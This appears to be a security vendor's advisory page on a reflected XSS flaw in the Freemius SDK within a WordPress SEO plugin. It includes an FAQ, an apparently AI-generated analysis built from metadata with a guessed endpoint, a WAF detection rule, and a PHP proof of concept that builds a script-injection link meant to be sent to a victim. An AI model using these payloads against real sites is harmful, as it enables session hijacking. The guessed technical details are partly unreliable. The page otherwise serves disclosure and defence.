What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius framework used by multiple WordPress plugins. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the ‘url’ parameter due to insufficient input sanitization.

Who is affected by this vulnerability?

WordPress installations using the Freemius framework, specifically versions of the ‘automatic-internal-links-for-seo’ plugin up to 2.10.1, are affected. Administrators should check their plugin versions to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the ‘automatic-internal-links-for-seo’ plugin installed on your WordPress site. If it is version 2.10.1 or earlier, your site is at risk.

What are the practical risks of this vulnerability?

The practical risks include the potential for attackers to execute arbitrary JavaScript in the context of your site, leading to session hijacking, credential theft, or redirection to malicious sites. Although user interaction is required, it can be exploited in targeted phishing campaigns.

How can I fix this vulnerability?

To fix this vulnerability, update the ‘automatic-internal-links-for-seo’ plugin to the latest version where the issue is resolved. Additionally, ensure that any custom code using the ‘url’ parameter properly sanitizes and escapes user input.

What does a CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability is not trivial to exploit, it poses a significant risk if successfully executed. It requires user interaction, which limits its spread but does not diminish its potential impact.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can craft a malicious URL that includes a payload in the ‘url’ parameter. When a victim clicks the link, the injected JavaScript executes in their browser, demonstrating the XSS vulnerability.

What is the root cause of this vulnerability?

The root cause of CVE-2024-13362 is the Freemius SDK’s failure to properly sanitize and escape the ‘url’ parameter before reflecting it in the page’s DOM. This oversight allows for the injection of malicious scripts.

Can this vulnerability be exploited without user interaction?

No, this vulnerability requires user interaction to be exploited. An attacker must trick a user into clicking a crafted link that contains the malicious payload.

What additional security measures can I implement?

In addition to updating the plugin, consider implementing Content Security Policy (CSP) headers to mitigate the impact of XSS vulnerabilities. Regularly audit your plugins and themes for security issues and ensure that all user inputs are properly sanitized.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, you can mitigate the risk by disabling the affected plugin until a fix is applied. Additionally, educate users about the risks of clicking unknown links.

Where can I find more information about this vulnerability?

More information about CVE-2024-13362 can be found on the National Vulnerability Database (NVD) and security advisories from the WordPress community. Regularly check for updates from plugin developers regarding vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 6, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (automatic-internal-links-for-seo)

CVE ID CVE-2024-13362

Plugin automatic-internal-links-for-seo

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.0.0

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This vulnerability is a Reflected DOM-Based Cross-Site Scripting (XSS) issue found in multiple WordPress plugins and/or themes using the Freemius framework, specifically in versions up to 2.10.1. The flaw involves insufficient sanitization of the ‘url’ parameter, allowing unauthenticated attackers to inject arbitrary JavaScript that executes when a victim clicks a crafted link. The CVSS v3.1 score is 6.1 (Medium), with a network attack vector, low attack complexity, no privileges required, but user interaction is required.

Root Cause: The Freemius SDK appears to handle a ‘url’ parameter in a client-side JavaScript context (DOM-based XSS). The description confirms that input sanitization and output escaping are missing. Because no plugin source code is available, Atomic Edge research infers that the vulnerability likely exists in a Freemius callback or redirect handler that takes a URL from the query string and writes it directly into the page DOM without proper encoding. This is a classic pattern where the ‘url’ parameter is echoed back in a JavaScript context or used to set window.location or innerHTML. The CWE classification (79) strongly supports this interpretation.

Exploitation: An attacker crafts a malicious link pointing to a vulnerable WordPress site with a manipulated ‘url’ parameter. The parameter value, most likely provided via the GET query string, is reflected into the page without sanitization, allowing injection of script tags or event handlers. The exploit leverages social engineering to trick a user into clicking the crafted link. The specific endpoint is likely one of the Freemius SDK’s AJAX or redirect handlers (e.g., /wp-admin/admin-ajax.php?action=fs_redirect or similar). The payload would be something like: ‘https://target-site.com/?url=javascript:alert(document.cookie)’ or a script tag in an encoded form. Successful execution runs arbitrary JavaScript in the victim’s browser within the context of the WordPress site.

Remediation: The fix should involve proper sanitization and escaping of the ‘url’ parameter. Atomic Edge analysis recommends using WordPress’s built-in functions like esc_url() to ensure the URL is safe for output, and potentially validating the URL against a whitelist of allowed destinations. The plugin should also avoid directly embedding user-supplied input into JavaScript code or DOM manipulation without proper encoding. Additionally, implementing a nonce check or capability verification (if applicable) could help, though the primary fix is output escaping.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. Since the attack requires user interaction (clicking a link), it is not wormable but can be used in targeted phishing campaigns. The scope change in CVSS (S:C) indicates the vulnerability can impact resources beyond the vulnerable component, such as stealing authentication tokens or accessing sensitive data on other parts of the site.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Virtual patch: Block reflected XSS attempts via the 'url' parameter commonly used in Freemius SDK.
# This rule targets the query string parameter 'url' with common XSS patterns.
# Note: The exact vulnerable endpoint is not confirmed, but this protects all requests with malicious 'url' parameter.
SecRule ARGS:url "@rx (?i)(?:<|%3C).*script|javascript:|onerror=|onload=|alert(|prompt(|confirm(" 
  "id:10013362,phase:2,deny,status:403,msg:'CVE-2024-13362 - Freemius DOM-Based XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

<?php

// Configuration
$target_url = 'http://example.com';  // Change to the target WordPress site
// Note: The exact vulnerable endpoint is unclear, but likely involves the 'url' parameter.
// This PoC assumes the vulnerable parameter is passed in the main query string.

// Crafted payload: inject a script that executes an alert
$payload = '"><script>alert("XSS")</script>';

// Build the malicious URL
$malicious_url = $target_url . '/?' . http_build_query(['url' => $payload]);

// Output the exploit URL for manual use (since we cannot simulate DOM execution via PHP)
echo "[+] Malicious URL: " . $malicious_url . "n";
echo "[+] Send this link to the victim. If vulnerable, a JavaScript alert will appear.n";

// Optionally: perform a cURL request to confirm reflection (though this will not execute JS)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Check if the payload is reflected in the response (simple check)
if (strpos($response, $payload) !== false) {
    echo "[+] Confirmed: The payload appears in the page source.n";
} else {
    echo "[-] The payload may not be reflected. The vulnerable endpoint may differ.n";
}
?>

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius framework used by multiple WordPress plugins. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the ‘url’ parameter due to insufficient input sanitization.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress installations using the Freemius framework, specifically versions of the ‘automatic-internal-links-for-seo’ plugin up to 2.10.1, are affected. Administrators should check their plugin versions to determine if they are at risk.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, verify the version of the ‘automatic-internal-links-for-seo’ plugin installed on your WordPress site. If it is version 2.10.1 or earlier, your site is at risk.
What are the practical risks of this vulnerability?
Understanding the impact
The practical risks include the potential for attackers to execute arbitrary JavaScript in the context of your site, leading to session hijacking, credential theft, or redirection to malicious sites. Although user interaction is required, it can be exploited in targeted phishing campaigns.
How can I fix this vulnerability?
Remediation steps
To fix this vulnerability, update the ‘automatic-internal-links-for-seo’ plugin to the latest version where the issue is resolved. Additionally, ensure that any custom code using the ‘url’ parameter properly sanitizes and escapes user input.
What does a CVSS score of 6.1 mean?
Interpreting the severity level
A CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability is not trivial to exploit, it poses a significant risk if successfully executed. It requires user interaction, which limits its spread but does not diminish its potential impact.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept illustrates how an attacker can craft a malicious URL that includes a payload in the ‘url’ parameter. When a victim clicks the link, the injected JavaScript executes in their browser, demonstrating the XSS vulnerability.
What is the root cause of this vulnerability?
Analyzing the underlying issue
The root cause of CVE-2024-13362 is the Freemius SDK’s failure to properly sanitize and escape the ‘url’ parameter before reflecting it in the page’s DOM. This oversight allows for the injection of malicious scripts.
Can this vulnerability be exploited without user interaction?
Exploit requirements
No, this vulnerability requires user interaction to be exploited. An attacker must trick a user into clicking a crafted link that contains the malicious payload.
What additional security measures can I implement?
Enhancing site security
In addition to updating the plugin, consider implementing Content Security Policy (CSP) headers to mitigate the impact of XSS vulnerabilities. Regularly audit your plugins and themes for security issues and ensure that all user inputs are properly sanitized.
What should I do if I cannot update the plugin immediately?
Interim mitigation strategies
If immediate updates are not possible, you can mitigate the risk by disabling the affected plugin until a fix is applied. Additionally, educate users about the risks of clicking unknown links.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2024-13362 can be found on the National Vulnerability Database (NVD) and security advisories from the WordPress community. Regularly check for updates from plugin developers regarding vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations